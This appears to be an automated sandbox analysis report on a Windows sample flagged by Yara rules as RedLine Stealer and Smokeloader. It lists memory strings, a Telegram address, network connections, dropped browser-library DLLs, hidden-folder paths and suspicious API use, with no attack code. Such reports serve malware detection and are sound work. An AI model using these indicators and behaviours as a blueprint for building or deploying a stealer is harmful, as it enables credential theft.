Source: file.exe, file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/armad2a
Source: file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://www2.mk16.de/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.6:49714 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2762173907.000000000249D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C84B700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C84B8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C84B910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C7EF280

Contains functionality to launch a process as a different user

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FFDA38CF0FE strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,

23_2_00007FFDA38CF0FE

Deletes files inside the Windows folder

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

File deleted: C:\Windows\Temp\1kuzcKGx

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041BD50	0_2_0041BD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A130	0_2_0041A130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00419B58	0_2_00419B58
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00419B30	0_2_00419B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E35A0	0_2_6C7E35A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8434A0	0_2_6C8434A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84C4A0	0_2_6C84C4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F5440	0_2_6C7F5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80D4D0	0_2_6C80D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C826CF0	0_2_6C826CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85AC00	0_2_6C85AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C825C10	0_2_6C825C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C832C10	0_2_6C832C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7ED4E0	0_2_6C7ED4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85542B	0_2_6C85542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F64C0	0_2_6C7F64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85545C	0_2_6C85545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F6C80	0_2_6C7F6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C820DD0	0_2_6C820DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8485F0	0_2_6C8485F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FFD00	0_2_6C7FFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80ED10	0_2_6C80ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C810512	0_2_6C810512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84E680	0_2_6C84E680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EC670	0_2_6C7EC670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C805E90	0_2_6C805E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C844EA0	0_2_6C844EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8576E3	0_2_6C8576E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C835600	0_2_6C835600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EBEF0	0_2_6C7EBEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FFEF0	0_2_6C7FFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C827E10	0_2_6C827E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C849E30	0_2_6C849E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C804640	0_2_6C804640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C832E4E	0_2_6C832E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C809E50	0_2_6C809E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C823E50	0_2_6C823E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C856E63	0_2_6C856E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8377A0	0_2_6C8377A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C816FF0	0_2_6C816FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F9F00	0_2_6C7F9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C827710	0_2_6C827710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EDFE0	0_2_6C7EDFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8160A0	0_2_6C8160A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8550C7	0_2_6C8550C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80C0E0	0_2_6C80C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8258E0	0_2_6C8258E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F7810	0_2_6C7F7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82B820	0_2_6C82B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C834820	0_2_6C834820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C808850	0_2_6C808850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80D850	0_2_6C80D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82F070	0_2_6C82F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C825190	0_2_6C825190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C842990	0_2_6C842990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FD960	0_2_6C7FD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81D9B0	0_2_6C81D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80A940	0_2_6C80A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EC9A0	0_2_6C7EC9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C83B970	0_2_6C83B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85B170	0_2_6C85B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85BA90	0_2_6C85BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C814AA0	0_2_6C814AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C852AB0	0_2_6C852AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C828AC0	0_2_6C828AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C801AF0	0_2_6C801AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82E2F0	0_2_6C82E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FCAB0	0_2_6C7FCAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E22A0	0_2_6C7E22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C829A60	0_2_6C829A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FC370	0_2_6C7FC370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E5340	0_2_6C7E5340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8553C8	0_2_6C8553C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82D320	0_2_6C82D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EF380	0_2_6C7EF380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C88ECC0	0_2_6C88ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8EECD0	0_2_6C8EECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C956C00	0_2_6C956C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C96AC30	0_2_6C96AC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C89AC60	0_2_6C89AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C926D90	0_2_6C926D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C894DB0	0_2_6C894DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA1CDC0	0_2_6CA1CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA18D20	0_2_6CA18D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BAD50	0_2_6C9BAD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C95ED70	0_2_6C95ED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C916E90	0_2_6C916E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C89AEC0	0_2_6C89AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C930EC0	0_2_6C930EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C970E20	0_2_6C970E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C92EE70	0_2_6C92EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D8FB0	0_2_6C9D8FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C89EFB0	0_2_6C89EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C96EFF0	0_2_6C96EFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C890FE0	0_2_6C890FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C896F10	0_2_6C896F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D0F20	0_2_6C9D0F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8FEF40	0_2_6C8FEF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C952F70	0_2_6C952F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9968E0	0_2_6C9968E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8E0820	0_2_6C8E0820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C91A820	0_2_6C91A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C964840	0_2_6C964840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9509B0	0_2_6C9509B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9209A0	0_2_6C9209A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C94A9A0	0_2_6C94A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9AC9E0	0_2_6C9AC9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C49F0	0_2_6C8C49F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8E6900	0_2_6C8E6900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C8960	0_2_6C8C8960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C90EA80	0_2_6C90EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C93EA00	0_2_6C93EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C948A30	0_2_6C948A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C90CA70	0_2_6C90CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C930BA0	0_2_6C930BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C996BE0	0_2_6C996BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BA480	0_2_6C9BA480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C92A4D0	0_2_6C92A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8D64D0	0_2_6C8D64D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C91A430	0_2_6C91A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8F4420	0_2_6C8F4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8A8460	0_2_6C8A8460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8845B0	0_2_6C8845B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C91E5F0	0_2_6C91E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C95A5E0	0_2_6C95A5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D8550	0_2_6C9D8550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8E8540	0_2_6C8E8540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C994540	0_2_6C994540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C930570	0_2_6C930570
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03327B92	6_2_03327B92
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03336BCE	6_2_03336BCE
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03324962	6_2_03324962
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03325956	6_2_03325956
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_0332C95A	6_2_0332C95A
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_033298AA	6_2_033298AA
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03334F9A	6_2_03334F9A
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03325EE6	6_2_03325EE6
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_0333CCD2	6_2_0333CCD2
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF62094C490	23_2_00007FF62094C490
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38A08D0	23_2_00007FFDA38A08D0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D2520	23_2_00007FFDA38D2520
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0AEFB0	23_2_00007FFDAC0AEFB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0DCB60	23_2_00007FFDAC0DCB60
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0FEAF0	23_2_00007FFDAC0FEAF0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC1063E7	23_2_00007FFDAC1063E7
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC1304B0	23_2_00007FFDAC1304B0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC128D2B	23_2_00007FFDAC128D2B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC128E16	23_2_00007FFDAC128E16
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC128F5E	23_2_00007FFDAC128F5E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC12904C	23_2_00007FFDAC12904C

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Enables security privileges

Source: C:\Windows\System32\icacls.exe

Process token adjusted: Security

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8B9B10 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA109D0 appears 140 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C81CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA1DAE0 appears 34 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00402000 appears 287 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8294D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8B3620 appears 35 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDAC0F1352 appears 398 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FF620942EF2 appears 314 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDAC0D20C2 appears 356 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDA38940D2 appears 473 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDA38CC852 appears 526 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDAC0A9DC2 appears 405 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDAC1277A2 appears 388 times

One or more processes crash

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5012 -ip 5012

PE file contains more sections than normal

Source: 1kuzcKGx.23.dr	Static PE information: Number of sections : 11 > 10
Source: KXEmxT2p.23.dr	Static PE information: Number of sections : 11 > 10
Source: Lx9RtFcl.23.dr	Static PE information: Number of sections : 11 > 10
Source: S7evpAMe.23.dr	Static PE information: Number of sections : 11 > 10
Source: samctl.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: g29qQU9G.23.dr	Static PE information: Number of sections : 11 > 10
Source: evtsrv.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: h0yu5TYE.23.dr	Static PE information: Number of sections : 11 > 10
Source: BFCAAEHJDB.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: FHLBnhuN.23.dr	Static PE information: Number of sections : 11 > 10
Source: cnccli.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: 7847438767[1].exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: prgmgr.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: libi2p.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: fJw4qvYl.23.dr	Static PE information: Number of sections : 11 > 10
Source: termsrv32.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: rdpctl.dll.23.dr	Static PE information: Number of sections : 11 > 10

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2788213145.000000006C872000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2761930657.0000000002461000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2781145830.000000003B860000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs file.exe
Source: file.exe, 00000000.00000002.2776697381.000000002F98F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs file.exe
Source: file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
